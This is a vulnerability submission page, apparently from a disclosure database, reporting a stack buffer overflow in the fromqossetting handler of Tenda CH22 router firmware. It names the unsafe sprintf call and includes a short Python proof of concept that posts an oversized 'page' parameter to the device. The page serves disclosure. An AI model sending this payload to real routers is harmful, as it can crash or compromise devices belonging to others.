Submit #850454: Tenda CH22 V1.0.0.1 Buffer Overflowinfo

TitleTenda CH22 V1.0.0.1 Buffer Overflow
DescriptionOverview Firmware download website: https://www.tenda.com.cn/download/2230 Affected version CH22 V1.0.0.1 Vulnerability details The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the fromqossetting function. The v8 variable receives the page parameter from a POST request and is later passed to the sprintf function. However, since the user can control the input of page , the statement sprintf(s, "qos_list.asp?page=%s", v8); can cause a buffer overflow. PoC import requests ip = "192.168.1.1" url = f'http://{ip}/goform/qossetting' payload = b'a' * 1000 data = {    'page':payload } requests.post(url, data=data)
Source⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromqossetting-377df0aa118580ad8e91eff246d1543d
User
 ysnysn0121 (UID 86198)
Submission06/06/2026 10:30 (29 days ago)
Moderation07/04/2026 18:23 (28 days later)
StatusDuplicate
VulDB entry277436 [Tenda CH22 1.0.0.6(468) /goform/fromqossetting qos stack-based overflow]
Points0

Interested in the pricing of exploits?

See the underground prices here!